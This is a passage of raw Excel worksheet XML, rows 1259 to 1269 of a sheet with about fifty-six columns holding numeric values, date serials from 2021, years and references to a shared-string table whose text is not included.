      </c>
      <c r="AV1259">
        <v>0</v>
      </c>
      <c r="AW1259">
        <v>3</v>
      </c>
      <c r="AX1259">
        <v>0</v>
      </c>
      <c r="AY1259">
        <v>13</v>
      </c>
      <c r="AZ1259">
        <v>1</v>
      </c>
      <c r="BA1259" t="s">
        <v>17751</v>
      </c>
      <c r="BB1259" t="s">
        <v>16177</v>
      </c>
      <c r="BC1259" t="s">
        <v>14172</v>
      </c>
      <c r="BD1259" t="s">
        <v>14173</v>
      </c>
    </row>
    <row r="1260" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1260">
        <v>5714</v>
      </c>
      <c r="B1260" t="s">
        <v>9345</v>
      </c>
      <c r="C1260" t="s">
        <v>579</v>
      </c>
      <c r="D1260" t="s">
        <v>9346</v>
      </c>
      <c r="E1260" t="s">
        <v>300</v>
      </c>
      <c r="F1260" t="s">
        <v>9347</v>
      </c>
      <c r="G1260" s="1">
        <v>44363</v>
      </c>
      <c r="H1260">
        <v>11941</v>
      </c>
      <c r="I1260">
        <v>11941</v>
      </c>
      <c r="J1260">
        <v>0</v>
      </c>
      <c r="K1260">
        <v>1</v>
      </c>
      <c r="L1260">
        <v>0</v>
      </c>
      <c r="M1260">
        <v>0</v>
      </c>
      <c r="N1260">
        <v>0</v>
      </c>
      <c r="O1260">
        <v>0</v>
      </c>
      <c r="P1260">
        <v>0</v>
      </c>
      <c r="Q1260">
        <v>1</v>
      </c>
      <c r="R1260">
        <v>4</v>
      </c>
      <c r="S1260">
        <v>0</v>
      </c>
      <c r="T1260">
        <v>1</v>
      </c>
      <c r="U1260">
        <v>0</v>
      </c>
      <c r="V1260">
        <v>500</v>
      </c>
      <c r="W1260">
        <v>0</v>
      </c>
      <c r="X1260">
        <v>0</v>
      </c>
      <c r="Y1260">
        <v>0</v>
      </c>
      <c r="Z1260">
        <v>0</v>
      </c>
      <c r="AA1260">
        <v>0</v>
      </c>
      <c r="AB1260">
        <v>200</v>
      </c>
      <c r="AC1260">
        <v>200</v>
      </c>
      <c r="AD1260">
        <v>0</v>
      </c>
      <c r="AE1260">
        <v>500</v>
      </c>
      <c r="AF1260" t="s">
        <v>9348</v>
      </c>
      <c r="AG1260">
        <v>76116</v>
      </c>
      <c r="AH1260">
        <v>23</v>
      </c>
      <c r="AJ1260">
        <v>363</v>
      </c>
      <c r="AK1260" t="s">
        <v>583</v>
      </c>
      <c r="AL1260" t="s">
        <v>584</v>
      </c>
      <c r="AM1260" t="s">
        <v>9349</v>
      </c>
      <c r="AN1260" t="s">
        <v>68</v>
      </c>
      <c r="AO1260">
        <v>2021</v>
      </c>
      <c r="AP1260">
        <v>82131111161</v>
      </c>
      <c r="AQ1260" t="s">
        <v>9350</v>
      </c>
      <c r="AR1260" t="s">
        <v>9348</v>
      </c>
      <c r="AS1260" t="s">
        <v>71</v>
      </c>
      <c r="AT1260" t="s">
        <v>72</v>
      </c>
      <c r="AU1260">
        <v>30</v>
      </c>
      <c r="AV1260">
        <v>0</v>
      </c>
      <c r="AW1260">
        <v>2</v>
      </c>
      <c r="AX1260">
        <v>0</v>
      </c>
      <c r="AY1260">
        <v>1</v>
      </c>
      <c r="AZ1260">
        <v>1</v>
      </c>
      <c r="BA1260" t="s">
        <v>17744</v>
      </c>
      <c r="BB1260" t="s">
        <v>16183</v>
      </c>
      <c r="BC1260" t="s">
        <v>14124</v>
      </c>
      <c r="BD1260" t="s">
        <v>10285</v>
      </c>
    </row>
    <row r="1261" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1261">
        <v>5799</v>
      </c>
      <c r="B1261" t="s">
        <v>9351</v>
      </c>
      <c r="C1261" t="s">
        <v>726</v>
      </c>
      <c r="D1261" t="s">
        <v>9352</v>
      </c>
      <c r="E1261" t="s">
        <v>111</v>
      </c>
      <c r="F1261" t="s">
        <v>9353</v>
      </c>
      <c r="G1261" s="1">
        <v>44358</v>
      </c>
      <c r="H1261">
        <v>12010</v>
      </c>
      <c r="I1261">
        <v>12010</v>
      </c>
      <c r="J1261">
        <v>1</v>
      </c>
      <c r="K1261">
        <v>0</v>
      </c>
      <c r="L1261">
        <v>2</v>
      </c>
      <c r="M1261">
        <v>0</v>
      </c>
      <c r="N1261">
        <v>0</v>
      </c>
      <c r="O1261">
        <v>0</v>
      </c>
      <c r="P1261">
        <v>0</v>
      </c>
      <c r="Q1261">
        <v>6</v>
      </c>
      <c r="R1261">
        <v>0</v>
      </c>
      <c r="S1261">
        <v>0</v>
      </c>
      <c r="T1261">
        <v>0</v>
      </c>
      <c r="U1261">
        <v>150</v>
      </c>
      <c r="V1261">
        <v>0</v>
      </c>
      <c r="W1261">
        <v>6000</v>
      </c>
      <c r="X1261">
        <v>0</v>
      </c>
      <c r="Y1261">
        <v>0</v>
      </c>
      <c r="Z1261">
        <v>0</v>
      </c>
      <c r="AA1261">
        <v>0</v>
      </c>
      <c r="AB1261">
        <v>0</v>
      </c>
      <c r="AC1261">
        <v>0</v>
      </c>
      <c r="AD1261">
        <v>0</v>
      </c>
      <c r="AE1261">
        <v>0</v>
      </c>
      <c r="AF1261" t="s">
        <v>9354</v>
      </c>
      <c r="AG1261">
        <v>97791</v>
      </c>
      <c r="AH1261">
        <v>32</v>
      </c>
      <c r="AJ1261">
        <v>466</v>
      </c>
      <c r="AK1261" t="s">
        <v>8276</v>
      </c>
      <c r="AL1261" t="s">
        <v>9355</v>
      </c>
      <c r="AM1261" t="s">
        <v>9356</v>
      </c>
      <c r="AN1261" t="s">
        <v>55</v>
      </c>
      <c r="AO1261">
        <v>2019</v>
      </c>
      <c r="AP1261">
        <v>82236401050</v>
      </c>
      <c r="AQ1261" t="s">
        <v>9357</v>
      </c>
      <c r="AR1261" t="s">
        <v>9358</v>
      </c>
      <c r="AS1261" t="s">
        <v>71</v>
      </c>
      <c r="AT1261" t="s">
        <v>58</v>
      </c>
      <c r="AU1261">
        <v>50</v>
      </c>
      <c r="AV1261">
        <v>0</v>
      </c>
      <c r="AW1261">
        <v>5</v>
      </c>
      <c r="AX1261">
        <v>0</v>
      </c>
      <c r="AY1261">
        <v>2</v>
      </c>
      <c r="AZ1261">
        <v>1</v>
      </c>
      <c r="BA1261" t="s">
        <v>17753</v>
      </c>
      <c r="BB1261">
        <v>0</v>
      </c>
      <c r="BC1261" t="s">
        <v>14126</v>
      </c>
      <c r="BD1261" t="s">
        <v>14127</v>
      </c>
    </row>
    <row r="1262" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1262">
        <v>5686</v>
      </c>
      <c r="B1262" t="s">
        <v>9359</v>
      </c>
      <c r="C1262" t="s">
        <v>99</v>
      </c>
      <c r="D1262" t="s">
        <v>9360</v>
      </c>
      <c r="E1262" t="s">
        <v>142</v>
      </c>
      <c r="F1262" t="s">
        <v>9361</v>
      </c>
      <c r="G1262" s="1">
        <v>44369</v>
      </c>
      <c r="H1262">
        <v>12047</v>
      </c>
      <c r="I1262">
        <v>12047</v>
      </c>
      <c r="J1262">
        <v>1</v>
      </c>
      <c r="K1262">
        <v>0</v>
      </c>
      <c r="L1262">
        <v>1</v>
      </c>
      <c r="M1262">
        <v>0</v>
      </c>
      <c r="N1262">
        <v>0</v>
      </c>
      <c r="O1262">
        <v>0</v>
      </c>
      <c r="P1262">
        <v>0</v>
      </c>
      <c r="Q1262">
        <v>0</v>
      </c>
      <c r="R1262">
        <v>0</v>
      </c>
      <c r="S1262">
        <v>0</v>
      </c>
      <c r="T1262">
        <v>0</v>
      </c>
      <c r="U1262">
        <v>600000</v>
      </c>
      <c r="V1262">
        <v>0</v>
      </c>
      <c r="W1262">
        <v>0</v>
      </c>
      <c r="X1262">
        <v>0</v>
      </c>
      <c r="Y1262">
        <v>0</v>
      </c>
      <c r="Z1262">
        <v>0</v>
      </c>
      <c r="AA1262">
        <v>0</v>
      </c>
      <c r="AB1262">
        <v>0</v>
      </c>
      <c r="AC1262">
        <v>0</v>
      </c>
      <c r="AD1262">
        <v>0</v>
      </c>
      <c r="AE1262">
        <v>0</v>
      </c>
      <c r="AF1262" t="s">
        <v>9362</v>
      </c>
      <c r="AG1262">
        <v>14440</v>
      </c>
      <c r="AH1262">
        <v>12</v>
      </c>
      <c r="AJ1262">
        <v>160</v>
      </c>
      <c r="AK1262" t="s">
        <v>114</v>
      </c>
      <c r="AL1262" t="s">
        <v>114</v>
      </c>
      <c r="AM1262" t="s">
        <v>9363</v>
      </c>
      <c r="AN1262" t="s">
        <v>55</v>
      </c>
      <c r="AO1262">
        <v>2019</v>
      </c>
      <c r="AP1262" t="s">
        <v>623</v>
      </c>
      <c r="AQ1262" t="s">
        <v>9364</v>
      </c>
      <c r="AR1262" t="s">
        <v>9362</v>
      </c>
      <c r="AS1262" t="s">
        <v>179</v>
      </c>
      <c r="AT1262" t="s">
        <v>58</v>
      </c>
      <c r="AU1262">
        <v>0</v>
      </c>
      <c r="AV1262">
        <v>0</v>
      </c>
      <c r="AW1262">
        <v>3</v>
      </c>
      <c r="AX1262">
        <v>0</v>
      </c>
      <c r="AY1262">
        <v>13</v>
      </c>
      <c r="AZ1262">
        <v>2</v>
      </c>
      <c r="BA1262" t="s">
        <v>17732</v>
      </c>
      <c r="BB1262">
        <v>0</v>
      </c>
      <c r="BC1262" t="s">
        <v>14141</v>
      </c>
      <c r="BD1262" t="s">
        <v>14142</v>
      </c>
    </row>
    <row r="1263" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1263">
        <v>5800</v>
      </c>
      <c r="B1263" t="s">
        <v>9365</v>
      </c>
      <c r="C1263" t="s">
        <v>47</v>
      </c>
      <c r="D1263" t="s">
        <v>9366</v>
      </c>
      <c r="E1263" t="s">
        <v>843</v>
      </c>
      <c r="F1263" t="s">
        <v>9367</v>
      </c>
      <c r="G1263" s="1">
        <v>44363</v>
      </c>
      <c r="H1263">
        <v>12050</v>
      </c>
      <c r="I1263">
        <v>12050</v>
      </c>
      <c r="J1263">
        <v>0</v>
      </c>
      <c r="K1263">
        <v>1</v>
      </c>
      <c r="L1263">
        <v>0</v>
      </c>
      <c r="M1263">
        <v>0</v>
      </c>
      <c r="N1263">
        <v>0</v>
      </c>
      <c r="O1263">
        <v>0</v>
      </c>
      <c r="P1263">
        <v>0</v>
      </c>
      <c r="Q1263">
        <v>0</v>
      </c>
      <c r="R1263">
        <v>0</v>
      </c>
      <c r="S1263">
        <v>0</v>
      </c>
      <c r="T1263">
        <v>0</v>
      </c>
      <c r="U1263">
        <v>0</v>
      </c>
      <c r="V1263">
        <v>10000</v>
      </c>
      <c r="W1263">
        <v>0</v>
      </c>
      <c r="X1263">
        <v>0</v>
      </c>
      <c r="Y1263">
        <v>0</v>
      </c>
      <c r="Z1263">
        <v>0</v>
      </c>
      <c r="AA1263">
        <v>0</v>
      </c>
      <c r="AB1263">
        <v>0</v>
      </c>
      <c r="AC1263">
        <v>0</v>
      </c>
      <c r="AD1263">
        <v>0</v>
      </c>
      <c r="AE1263">
        <v>0</v>
      </c>
      <c r="AF1263" t="s">
        <v>9368</v>
      </c>
      <c r="AG1263">
        <v>21258</v>
      </c>
      <c r="AH1263">
        <v>2</v>
      </c>
      <c r="AJ1263">
        <v>42</v>
      </c>
      <c r="AK1263" t="s">
        <v>9369</v>
      </c>
      <c r="AL1263" t="s">
        <v>9370</v>
      </c>
      <c r="AM1263" t="s">
        <v>9371</v>
      </c>
      <c r="AN1263" t="s">
        <v>68</v>
      </c>
      <c r="AO1263">
        <v>2020</v>
      </c>
      <c r="AP1263">
        <v>8537230082134</v>
      </c>
      <c r="AQ1263" t="s">
        <v>9372</v>
      </c>
      <c r="AR1263" t="s">
        <v>9368</v>
      </c>
      <c r="AS1263" t="s">
        <v>71</v>
      </c>
      <c r="AT1263" t="s">
        <v>72</v>
      </c>
      <c r="AU1263">
        <v>26</v>
      </c>
      <c r="AV1263">
        <v>1</v>
      </c>
      <c r="AW1263">
        <v>5</v>
      </c>
      <c r="AX1263">
        <v>0</v>
      </c>
      <c r="AY1263">
        <v>3</v>
      </c>
      <c r="AZ1263">
        <v>1</v>
      </c>
      <c r="BA1263" t="s">
        <v>16806</v>
      </c>
      <c r="BB1263">
        <v>0</v>
      </c>
      <c r="BC1263" t="s">
        <v>14135</v>
      </c>
      <c r="BD1263" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="1264" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1264">
        <v>5768</v>
      </c>
      <c r="B1264" t="s">
        <v>9373</v>
      </c>
      <c r="C1264" t="s">
        <v>99</v>
      </c>
      <c r="D1264" t="s">
        <v>9374</v>
      </c>
      <c r="E1264" t="s">
        <v>142</v>
      </c>
      <c r="F1264" t="s">
        <v>9361</v>
      </c>
      <c r="G1264" s="1">
        <v>44369</v>
      </c>
      <c r="H1264">
        <v>12064</v>
      </c>
      <c r="I1264">
        <v>12064</v>
      </c>
      <c r="J1264">
        <v>1</v>
      </c>
      <c r="K1264">
        <v>2</v>
      </c>
      <c r="L1264">
        <v>1</v>
      </c>
      <c r="M1264">
        <v>0</v>
      </c>
      <c r="N1264">
        <v>0</v>
      </c>
      <c r="O1264">
        <v>0</v>
      </c>
      <c r="P1264">
        <v>0</v>
      </c>
      <c r="Q1264">
        <v>0</v>
      </c>
      <c r="R1264">
        <v>0</v>
      </c>
      <c r="S1264">
        <v>1</v>
      </c>
      <c r="T1264">
        <v>0</v>
      </c>
      <c r="U1264">
        <v>600000</v>
      </c>
      <c r="V1264">
        <v>2</v>
      </c>
      <c r="W1264">
        <v>3000</v>
      </c>
      <c r="X1264">
        <v>0</v>
      </c>
      <c r="Y1264">
        <v>0</v>
      </c>
      <c r="Z1264">
        <v>0</v>
      </c>
      <c r="AA1264">
        <v>0</v>
      </c>
      <c r="AB1264">
        <v>0</v>
      </c>
      <c r="AC1264">
        <v>0</v>
      </c>
      <c r="AD1264">
        <v>1</v>
      </c>
      <c r="AE1264">
        <v>0</v>
      </c>
      <c r="AF1264" t="s">
        <v>9375</v>
      </c>
      <c r="AG1264">
        <v>14440</v>
      </c>
      <c r="AH1264">
        <v>12</v>
      </c>
      <c r="AJ1264">
        <v>160</v>
      </c>
      <c r="AK1264" t="s">
        <v>114</v>
      </c>
      <c r="AL1264" t="s">
        <v>114</v>
      </c>
      <c r="AM1264" t="s">
        <v>9376</v>
      </c>
      <c r="AN1264" t="s">
        <v>55</v>
      </c>
      <c r="AO1264">
        <v>2021</v>
      </c>
      <c r="AP1264">
        <v>8129981159</v>
      </c>
      <c r="AQ1264" t="s">
        <v>9377</v>
      </c>
      <c r="AR1264" t="s">
        <v>9375</v>
      </c>
      <c r="AS1264" t="s">
        <v>179</v>
      </c>
      <c r="AT1264" t="s">
        <v>58</v>
      </c>
      <c r="AU1264">
        <v>0</v>
      </c>
      <c r="AV1264">
        <v>0</v>
      </c>
      <c r="AW1264">
        <v>3</v>
      </c>
      <c r="AX1264">
        <v>0</v>
      </c>
      <c r="AY1264">
        <v>13</v>
      </c>
      <c r="AZ1264">
        <v>2</v>
      </c>
      <c r="BA1264" t="s">
        <v>17749</v>
      </c>
      <c r="BB1264">
        <v>0</v>
      </c>
      <c r="BC1264" t="s">
        <v>14145</v>
      </c>
      <c r="BD1264" t="s">
        <v>14146</v>
      </c>
    </row>
    <row r="1265" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1265">
        <v>5700</v>
      </c>
      <c r="B1265" t="s">
        <v>7012</v>
      </c>
      <c r="C1265" t="s">
        <v>318</v>
      </c>
      <c r="D1265" t="s">
        <v>9378</v>
      </c>
      <c r="E1265" t="s">
        <v>142</v>
      </c>
      <c r="F1265" t="s">
        <v>1746</v>
      </c>
      <c r="G1265" s="1">
        <v>44378</v>
      </c>
      <c r="H1265">
        <v>12073</v>
      </c>
      <c r="I1265">
        <v>12073</v>
      </c>
      <c r="J1265">
        <v>1</v>
      </c>
      <c r="K1265">
        <v>0</v>
      </c>
      <c r="L1265">
        <v>0</v>
      </c>
      <c r="M1265">
        <v>6</v>
      </c>
      <c r="N1265">
        <v>0</v>
      </c>
      <c r="O1265">
        <v>0</v>
      </c>
      <c r="P1265">
        <v>0</v>
      </c>
      <c r="Q1265">
        <v>4</v>
      </c>
      <c r="R1265">
        <v>0</v>
      </c>
      <c r="S1265">
        <v>0</v>
      </c>
      <c r="T1265">
        <v>1</v>
      </c>
      <c r="U1265">
        <v>50000</v>
      </c>
      <c r="V1265">
        <v>0</v>
      </c>
      <c r="W1265">
        <v>0</v>
      </c>
      <c r="X1265">
        <v>7000</v>
      </c>
      <c r="Y1265">
        <v>0</v>
      </c>
      <c r="Z1265">
        <v>0</v>
      </c>
      <c r="AA1265">
        <v>0</v>
      </c>
      <c r="AB1265">
        <v>20000</v>
      </c>
      <c r="AC1265">
        <v>0</v>
      </c>
      <c r="AD1265">
        <v>0</v>
      </c>
      <c r="AE1265">
        <v>2000</v>
      </c>
      <c r="AF1265" t="s">
        <v>5216</v>
      </c>
      <c r="AG1265">
        <v>90243</v>
      </c>
      <c r="AH1265">
        <v>26</v>
      </c>
      <c r="AJ1265">
        <v>420</v>
      </c>
      <c r="AK1265" t="s">
        <v>331</v>
      </c>
      <c r="AL1265" t="s">
        <v>332</v>
      </c>
      <c r="AM1265" t="s">
        <v>9379</v>
      </c>
      <c r="AN1265" t="s">
        <v>55</v>
      </c>
      <c r="AO1265">
        <v>2014</v>
      </c>
      <c r="AP1265" t="s">
        <v>9380</v>
      </c>
      <c r="AQ1265" t="s">
        <v>9381</v>
      </c>
      <c r="AR1265" t="s">
        <v>7068</v>
      </c>
      <c r="AS1265" t="s">
        <v>71</v>
      </c>
      <c r="AT1265" t="s">
        <v>58</v>
      </c>
      <c r="AU1265">
        <v>25</v>
      </c>
      <c r="AV1265">
        <v>1</v>
      </c>
      <c r="AW1265">
        <v>158</v>
      </c>
      <c r="AX1265">
        <v>183</v>
      </c>
      <c r="AY1265">
        <v>7</v>
      </c>
      <c r="AZ1265">
        <v>7</v>
      </c>
      <c r="BA1265" t="s">
        <v>16653</v>
      </c>
      <c r="BB1265">
        <v>0</v>
      </c>
      <c r="BC1265" t="s">
        <v>9536</v>
      </c>
      <c r="BD1265" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1266" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1266">
        <v>5790</v>
      </c>
      <c r="B1266" t="s">
        <v>9382</v>
      </c>
      <c r="C1266" t="s">
        <v>2308</v>
      </c>
      <c r="D1266" t="s">
        <v>9383</v>
      </c>
      <c r="E1266" t="s">
        <v>363</v>
      </c>
      <c r="F1266" t="s">
        <v>547</v>
      </c>
      <c r="G1266" s="1">
        <v>44372</v>
      </c>
      <c r="H1266">
        <v>12203</v>
      </c>
      <c r="I1266">
        <v>12203</v>
      </c>
      <c r="J1266">
        <v>0</v>
      </c>
      <c r="K1266">
        <v>0</v>
      </c>
      <c r="L1266">
        <v>0</v>
      </c>
      <c r="M1266">
        <v>0</v>
      </c>
      <c r="N1266">
        <v>0</v>
      </c>
      <c r="O1266">
        <v>0</v>
      </c>
      <c r="P1266">
        <v>0</v>
      </c>
      <c r="Q1266">
        <v>0</v>
      </c>
      <c r="R1266">
        <v>0</v>
      </c>
      <c r="S1266">
        <v>0</v>
      </c>
      <c r="T1266">
        <v>2</v>
      </c>
      <c r="U1266">
        <v>0</v>
      </c>
      <c r="V1266">
        <v>0</v>
      </c>
      <c r="W1266">
        <v>0</v>
      </c>
      <c r="X1266">
        <v>0</v>
      </c>
      <c r="Y1266">
        <v>0</v>
      </c>
      <c r="Z1266">
        <v>0</v>
      </c>
      <c r="AA1266">
        <v>0</v>
      </c>
      <c r="AB1266">
        <v>0</v>
      </c>
      <c r="AC1266">
        <v>0</v>
      </c>
      <c r="AD1266">
        <v>0</v>
      </c>
      <c r="AE1266">
        <v>7000</v>
      </c>
      <c r="AF1266" t="s">
        <v>9384</v>
      </c>
      <c r="AG1266">
        <v>98412</v>
      </c>
      <c r="AH1266">
        <v>33</v>
      </c>
      <c r="AJ1266">
        <v>485</v>
      </c>
      <c r="AK1266" t="s">
        <v>9385</v>
      </c>
      <c r="AL1266" t="s">
        <v>9386</v>
      </c>
      <c r="AM1266" t="s">
        <v>9387</v>
      </c>
      <c r="AN1266" t="s">
        <v>68</v>
      </c>
      <c r="AO1266">
        <v>2019</v>
      </c>
      <c r="AP1266">
        <v>82111111799</v>
      </c>
      <c r="AQ1266" t="s">
        <v>9388</v>
      </c>
      <c r="AR1266" t="s">
        <v>9384</v>
      </c>
      <c r="AS1266" t="s">
        <v>371</v>
      </c>
      <c r="AT1266" t="s">
        <v>72</v>
      </c>
      <c r="AU1266">
        <v>20</v>
      </c>
      <c r="AV1266">
        <v>0</v>
      </c>
      <c r="AW1266">
        <v>3</v>
      </c>
      <c r="AX1266">
        <v>0</v>
      </c>
      <c r="AY1266">
        <v>6</v>
      </c>
      <c r="AZ1266">
        <v>3</v>
      </c>
      <c r="BA1266" t="s">
        <v>17752</v>
      </c>
      <c r="BB1266">
        <v>0</v>
      </c>
      <c r="BC1266" t="s">
        <v>14192</v>
      </c>
      <c r="BD1266" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="1267" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1267">
        <v>5818</v>
      </c>
      <c r="B1267" t="s">
        <v>9389</v>
      </c>
      <c r="C1267" t="s">
        <v>3717</v>
      </c>
      <c r="D1267" t="s">
        <v>9390</v>
      </c>
      <c r="E1267" t="s">
        <v>2670</v>
      </c>
      <c r="F1267" t="s">
        <v>9391</v>
      </c>
      <c r="G1267" s="1">
        <v>44371</v>
      </c>
      <c r="H1267">
        <v>12311</v>
      </c>
      <c r="I1267">
        <v>12311</v>
      </c>
      <c r="J1267">
        <v>0</v>
      </c>
      <c r="K1267">
        <v>0</v>
      </c>
      <c r="L1267">
        <v>0</v>
      </c>
      <c r="M1267">
        <v>3</v>
      </c>
      <c r="N1267">
        <v>450</v>
      </c>
      <c r="O1267">
        <v>0</v>
      </c>
      <c r="P1267">
        <v>0</v>
      </c>
      <c r="Q1267">
        <v>1</v>
      </c>
      <c r="R1267">
        <v>1</v>
      </c>
      <c r="S1267">
        <v>0</v>
      </c>
      <c r="T1267">
        <v>0</v>
      </c>
      <c r="U1267">
        <v>0</v>
      </c>
      <c r="V1267">
        <v>0</v>
      </c>
      <c r="W1267">
        <v>0</v>
      </c>
      <c r="X1267">
        <v>650</v>
      </c>
      <c r="Y1267">
        <v>0</v>
      </c>
      <c r="Z1267">
        <v>0</v>
      </c>
      <c r="AA1267">
        <v>0</v>
      </c>
      <c r="AB1267">
        <v>300</v>
      </c>
      <c r="AC1267">
        <v>300</v>
      </c>
      <c r="AD1267">
        <v>0</v>
      </c>
      <c r="AE1267">
        <v>0</v>
      </c>
      <c r="AF1267" t="s">
        <v>9392</v>
      </c>
      <c r="AG1267">
        <v>38119</v>
      </c>
      <c r="AH1267">
        <v>8</v>
      </c>
      <c r="AJ1267">
        <v>125</v>
      </c>
      <c r="AK1267" t="s">
        <v>9393</v>
      </c>
      <c r="AL1267" t="s">
        <v>9394</v>
      </c>
      <c r="AM1267" t="s">
        <v>9395</v>
      </c>
      <c r="AN1267" t="s">
        <v>68</v>
      </c>
      <c r="AO1267">
        <v>2019</v>
      </c>
      <c r="AP1267">
        <v>85268225154</v>
      </c>
      <c r="AQ1267" t="s">
        <v>9396</v>
      </c>
      <c r="AR1267" t="s">
        <v>9392</v>
      </c>
      <c r="AS1267" t="s">
        <v>71</v>
      </c>
      <c r="AT1267" t="s">
        <v>72</v>
      </c>
      <c r="AU1267">
        <v>24</v>
      </c>
      <c r="AV1267">
        <v>0</v>
      </c>
      <c r="AW1267">
        <v>0</v>
      </c>
      <c r="AX1267">
        <v>0</v>
      </c>
      <c r="AY1267">
        <v>2</v>
      </c>
      <c r="AZ1267">
        <v>3</v>
      </c>
      <c r="BA1267" t="s">
        <v>17754</v>
      </c>
      <c r="BB1267" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1267" t="s">
        <v>10966</v>
      </c>
      <c r="BD1267">
        <v>0</v>
      </c>
    </row>
    <row r="1268" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1268">
        <v>5819</v>
      </c>
      <c r="B1268" t="s">
        <v>9397</v>
      </c>
      <c r="C1268" t="s">
        <v>3717</v>
      </c>
      <c r="D1268" t="s">
        <v>9398</v>
      </c>
      <c r="E1268" t="s">
        <v>916</v>
      </c>
      <c r="F1268" t="s">
        <v>9399</v>
      </c>
      <c r="G1268" s="1">
        <v>44371</v>
      </c>
      <c r="H1268">
        <v>12320</v>
      </c>
      <c r="I1268">
        <v>12320</v>
      </c>
      <c r="J1268">
        <v>0</v>
      </c>
      <c r="K1268">
        <v>0</v>
      </c>
      <c r="L1268">
        <v>0</v>
      </c>
      <c r="M1268">
        <v>1</v>
      </c>
      <c r="N1268">
        <v>300</v>
      </c>
      <c r="O1268">
        <v>1</v>
      </c>
      <c r="P1268">
        <v>0</v>
      </c>
      <c r="Q1268">
        <v>1</v>
      </c>
      <c r="R1268">
        <v>1</v>
      </c>
      <c r="S1268">
        <v>0</v>
      </c>
      <c r="T1268">
        <v>1</v>
      </c>
      <c r="U1268">
        <v>0</v>
      </c>
      <c r="V1268">
        <v>0</v>
      </c>
      <c r="W1268">
        <v>0</v>
      </c>
      <c r="X1268">
        <v>300</v>
      </c>
      <c r="Y1268">
        <v>0</v>
      </c>
      <c r="Z1268">
        <v>400</v>
      </c>
      <c r="AA1268">
        <v>0</v>
      </c>
      <c r="AB1268">
        <v>300</v>
      </c>
      <c r="AC1268">
        <v>300</v>
      </c>
      <c r="AD1268">
        <v>0</v>
      </c>
      <c r="AE1268">
        <v>300</v>
      </c>
      <c r="AF1268" t="s">
        <v>9400</v>
      </c>
      <c r="AG1268">
        <v>38371</v>
      </c>
      <c r="AH1268">
        <v>8</v>
      </c>
      <c r="AJ1268">
        <v>124</v>
      </c>
      <c r="AK1268" t="s">
        <v>9401</v>
      </c>
      <c r="AL1268" t="s">
        <v>9402</v>
      </c>
      <c r="AM1268" t="s">
        <v>9403</v>
      </c>
      <c r="AN1268" t="s">
        <v>68</v>
      </c>
      <c r="AO1268">
        <v>2019</v>
      </c>
      <c r="AP1268">
        <v>82381302153</v>
      </c>
      <c r="AQ1268" t="s">
        <v>9404</v>
      </c>
      <c r="AR1268" t="s">
        <v>9400</v>
      </c>
      <c r="AS1268" t="s">
        <v>71</v>
      </c>
      <c r="AT1268" t="s">
        <v>72</v>
      </c>
      <c r="AU1268">
        <v>24</v>
      </c>
      <c r="AV1268">
        <v>0</v>
      </c>
      <c r="AW1268">
        <v>0</v>
      </c>
      <c r="AX1268">
        <v>2</v>
      </c>
      <c r="AY1268">
        <v>0</v>
      </c>
      <c r="AZ1268">
        <v>4</v>
      </c>
      <c r="BA1268" t="s">
        <v>17755</v>
      </c>
      <c r="BB1268" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1268" t="s">
        <v>10966</v>
      </c>
      <c r="BD1268">
        <v>0</v>
      </c>
    </row>
    <row r="1269" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1269">
        <v>5928</v>
      </c>
      <c r="B1269" t="s">
        <v>9405</v>
      </c>
      <c r="C1269" t="s">
        <v>726</v>
      </c>
      <c r="D1269" t="s">
        <v>9172</v>
      </c>
      <c r="E1269" t="s">
        <v>142</v>
      </c>
      <c r="F1269" t="s">
        <v>666</v>
      </c>
      <c r="G1269" s="1">
        <v>44372</v>
      </c>
      <c r="H1269">
        <v>12415</v>
      </c>
      <c r="I1269">
        <v>12415</v>
      </c>
      <c r="J1269">
        <v>1</v>
      </c>
      <c r="K1269">
        <v>0</v>
      </c>
      <c r="L1269">
        <v>1</v>
      </c>
      <c r="M1269">
        <v>0</v>
      </c>
      <c r="N1269">
        <v>0</v>
      </c>
      <c r="O1269">
        <v>0</v>
      </c>
      <c r="P1269">
        <v>0</v>
      </c>
      <c r="Q1269">
        <v>5</v>
      </c>
      <c r="R1269">
        <v>0</v>
      </c>
      <c r="S1269">
        <v>0</v>
      </c>
      <c r="T1269">
        <v>2</v>
      </c>
      <c r="U1269">
        <v>80000</v>
      </c>
      <c r="V1269">
        <v>0</v>
      </c>
      <c r="W1269">
        <v>4000</v>
      </c>
      <c r="X1269">
        <v>0</v>
      </c>
      <c r="Y1269">
        <v>0</v>
      </c>
      <c r="Z1269">
        <v>0</v>
      </c>
      <c r="AA1269">
        <v>0</v>
      </c>
      <c r="AB1269">
        <v>2000</v>
      </c>
      <c r="AC1269">
        <v>0</v>
      </c>
      <c r="AD1269">
        <v>0</v>
      </c>
      <c r="AE1269">
        <v>5000</v>
      </c>
      <c r="AF1269" t="s">
        <v>9406</v>
      </c>
      <c r="AG1269">
        <v>97813</v>
      </c>
      <c r="AH1269">
        <v>32</v>
      </c>
      <c r="AJ1269">
        <v>472</v>
      </c>
      <c r="AK1269" t="s">
        <v>9407</v>
      </c>
      <c r="AL1269" t="s">
        <v>9175</v>
      </c>
      <c r="AM1269" t="s">
        <v>9408</v>
      </c>
      <c r="AN1269" t="s">
        <v>68</v>
      </c>
      <c r="AO1269">
        <v>2021</v>
      </c>
      <c r="AP1269">
        <v>85270208585</v>
      </c>
      <c r="AQ1269" t="s">
        <v>9409</v>
      </c>
      <c r="AR1269" t="s">
        <v>9406</v>
      </c>
      <c r="AS1269" t="s">
        <v>71</v>
      </c>
      <c r="AT1269" t="s">
        <v>72</v>
      </c>
      <c r="AU1269">
        <v>22</v>
      </c>
      <c r="AV1269">
        <v>0</v>
      </c>
      <c r="AW1269">
        <v>5</v>
      </c>
      <c r="AX1269">
        <v>0</v>
      </c>
      <c r="AY1269">
        <v>1</v>
      </c>
      <c r="AZ1269">
        <v>4</v>
      </c>
